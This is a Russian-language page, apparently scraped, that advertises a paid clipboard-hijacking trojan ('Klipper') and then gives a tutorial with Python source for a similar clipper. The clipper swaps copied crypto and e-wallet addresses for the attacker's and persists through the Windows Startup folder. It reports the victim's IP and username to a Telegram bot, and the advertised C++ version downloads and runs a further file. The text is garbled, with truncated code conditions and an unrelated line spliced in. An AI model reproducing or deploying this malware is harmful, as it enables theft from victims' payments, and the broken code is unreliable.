Danij
Полная автоматизация покупки и получения билдов. Работа бота 24/7. Цифровая подпись. Отсутствие зависимостей.
Клиппер [Clipper] [ClipBanker trojan] [Buffer changer] — троян, который попадая в систему, начинает мониторить буфер обмена на предмет совпадения значения в нем с каким-либо паттерном (про это ниже). Когда совпадение найдено — происходит подмена значения в буфере обмена на заданное.
Пример: жертва захотела оплатить какой-либо товар, и скопировала кошелек Bitcoin, на который нужно перевести n биткоинов. Далее она зашла в свой кошелек, вставила в поле для перевода кошелек, который скопировала, и отправляет платёж. Но на самом деле она вставила не тот кошелек, куда хотела перевести деньги, а нужный вам. Если жертва не замечает — деньги уходят вам.
Собственно, какие кошельки умеет подменять мой софт? На данный момент список таков: Bitcoin, BtcCash, ByteCoin, Emercoin, Blackcoin, Reddcoin, Ripple, Dash, Dogecoin, ETH, Litecoin, Monero, Zcash, Electroneum, Qiwi, YaMoney, WMR, WMU, WME, WMZ, WMX, Steam(ссылка на обмен), goo.gl(сервис сокращения ссылок), vk.cc(сервис сокращения ссылок), yadisc(Яндекс.Диск), Neo [15 криптовалют, 7 эл. кошельков, 3 сторонних сервиса]. Думаю, данный список будет дополнен.
Стрим. Конфигурация Klipper — технарь расскажет))
Почему «Клиппер» и «Клиппер+»?
В версиях есть некоторые отличия, хоть и не кардинальные.
Клиппер:
Язык программирования: C.
Полностью оффлайн работа, нет лишних запросов в сеть.
Сравнительно небольшой вес билда (72кб).
«Прячется» на устройстве в одной из уже существующих скрытых папок, создавая в ней свою подпапку.
Клиппер+
Язык программирования: C++.
Имеется возможность установить ссылку на Iplogger и прямую ссылку на файл (если вам нужно) (используйте свой хост, либо BitBucket). При первом запуске отстукивает в IpLogger с информацией о системе (OS, bit CPU, GPU), и скачивает файл по заданной ссылке, с последующим его запуском.
Имеется возможность установить IpLogger2, куда клиппер будет отстукивать в случае подмены.
Вес билда 180кб.
«Прячется» на устройстве в одной из уже существующих скрытых папок, создавая в ней подпапку с аттрибутами System https://telegra.ph/Klipper-by-Danij—obshchaya-informaciya-03-06″ target=»_blank»]telegra.ph[/mask_link]
Пишем свой клиппер для подмены кошельков на PYTHON [BlackCoding]
Привет хацкеры, сегодня покажу как собрать свой клиппер для подмены кошельков.
Нам потребуется: Python версии 3,6+
Подмена крипто-кошельков (Monero, BTC, BitcoinCash, LiteCoin, Ripple, Eth) Подмена Steam trade link Подмена WebMoney (WMZ, WMX, WMR, WMU) Подмена Q1w1 (+7, +3 и тд) Подмена Payeer Подмена DonationAlerts Подмена Qiwi.me
Автозагрузка Отстук в телеграм IP жертвы UserName жертвы Проверка первый ли запускНам понадобятся следующие библиотеки:
Установка octoprint на Raspberry pi для вашего 3д принтера| Настройка Телеграмм Бот
win32clipboard time threading os sys telebot shutil requestsУстановить их можно командой pip install (в консоли CMD)
Приступим!
Далее идём в лс к своему боту и пишем: /start ну и test на всякий случай)
Дальше открываем IDE и начинаем кодить
import win32clipboard import time import threading import os import sys import telebot import shutil import requests
token = «ТОКЕНОТБОТА» bot = telebot.TeleBot(token) username = os.getlogin() start = » #———-EDITING———- btc = ‘your_btc’ eth = ‘your_eth’ ripple = ‘your_ripple’ btc_cash = ‘your_btc_cash’ litecoin = ‘your_litecoin’ monero =’your_monero’ steamlink = ‘steam’ wmr = ‘WebRu’ wmz = ‘WebDol’ wmx = ‘WebBit’ wmu = ‘WebUa’ dona = ‘donat’ payeer = ‘your_Payeer’ qiwime = ‘your_qiw1.me’ qiwi = ‘your_number’ #———-EDITING———-
is_first = TrueПроверяем первый ли это запуск
if os.path.isfile(os.getenv(«APPDATA») + ‘MicrosoftWindowsStart MenuProgramsStartup’ + ‘ ‘[0] + os.path.basename(sys.argv[0])) is False: shutil.copy2(sys.argv[0], os.getenv(«APPDATA») + ‘MicrosoftWindowsStart MenuProgramsStartup’) else: is_first = False
Если в директории Startup нет нашего файл то запуск считается первым, и соответсвенно мы его туда добавляем.
Создаём функцию и цикл с названием clipper
def clipper(): while True:
win32clipboard.OpenClipboard() if win32clipboard.EnumClipboardFormats(win32clipboard.CF_UNICODETEXT) != 0: clip_data = win32clipboard.GetClipboardData(win32clipboard.CF_UNICODETEXT)Проверяем если у нас что-то в буфере обмены.
Далее будет много кода после кода объясню что он означает
if 25
крипто-кошельки
Вообщем первая строка проверяет в буфере обмена кошелёк BTC, таким образом:
Если в буфере обмена есть от 25 до 34 (или равным 34) символом, при том что первый символ равен 1:
То выполнять подмены с вашим кошельком (постарался сделать так что-бы было вам понятней)
Следующие строки кода:
Если в буфере 42 символа и первые два символа равны 0x:
То выполнять подмены с вашим эфир кошельком
И так с остальными крипто-кошельками
elif 75
Строки выше проверяют наличие в буфере трейд ссылки стима и заменяют на вашу
elif 12
Это проверяет наличие WebMoney кошелька, работает так:
Если в буфере от 12 до 13 символов и первые из них либо R Z X U:
То менять на ваши кошели
elif 37
Подмена DonationAlerts
elif 8
Подмена Payeer
elif 10
Подмена qiwi.me
Так-с с подменами разобрались, теперь пишем вот так:
win32clipboard.CloseClipboard() time.sleep(0.25) clipper = threading.Thread(target=clipper) clipper.start()
Условно говоря это запуск нашего клиппера.
start += ‘Is first start: ‘ + str(is_first) + ‘n’ r = requests.get(‘http://ip.42.pl/raw’) ip = r.text
Первая строка кода выше: Проверка первый ли это запуск.
Вторая строка: Отправляет запрос на сайт http://ip.42.pl/raw и копирует ip жертвы
Третия строка: объявляет переменную ip с айпишником жертвы
Код: (НЕ ЗАБУДЬТЕ ВМЕСТО CHATID НАПИСАТЬ СВОЙ ID ЧАТА)
try: bot.send_message(CHATID, ‘New User from: ‘ + ip + ‘nUsername: ‘ + username + ‘nStart: ‘ + start) except: print(‘.’)
Пробуем отправить сообщение в бота о новой жертве
Теперь можно собрать скрипт в .exe при помощи pyinstaller (Сюда не буду писать, погуглите это не сложно или поищите в прошлых статьях)
import win32clipboard import time import threading import os import sys import telebot import shutil import requests #————Telegram BOT————# token = «ТОКЕН» bot = telebot.TeleBot(token) #————Telegram BOT————# username = os.getlogin() start = » #—————EDITING—————# btc = ‘testworking_btc’ eth = ‘testworking_eth’ ripple = ‘testworking_ripple’ btc_cash = ‘testworking_btc_cash’ litecoin = ‘testworking_litecoin’ monero = ‘testworking_monero’ steamlink = ‘steam’ wmr = ‘WebRu’ wmz = ‘WebDol’ wmx = ‘WebBit’ wmu = ‘WebUa’ dona = ‘donat’ payeer = ‘fakePayeer’ qiwime = ‘qiwitest’ qiwi = ‘number’ #—————EDITING—————# is_first = True if os.path.isfile(os.getenv(«APPDATA») + ‘MicrosoftWindowsStart MenuProgramsStartup’ + ‘ ‘[0] + os.path.basename(sys.argv[0])) is False: shutil.copy2(sys.argv[0], os.getenv(«APPDATA») + ‘MicrosoftWindowsStart MenuProgramsStartup’) else: is_first = False def clipper(): while True: win32clipboard.OpenClipboard() if win32clipboard.EnumClipboardFormats(win32clipboard.CF_UNICODETEXT) != 0: clip_data = win32clipboard.GetClipboardData(win32clipboard.CF_UNICODETEXT) if 25
Dark $ide — Твоя Тёмная Сторона
Источник: teletype.in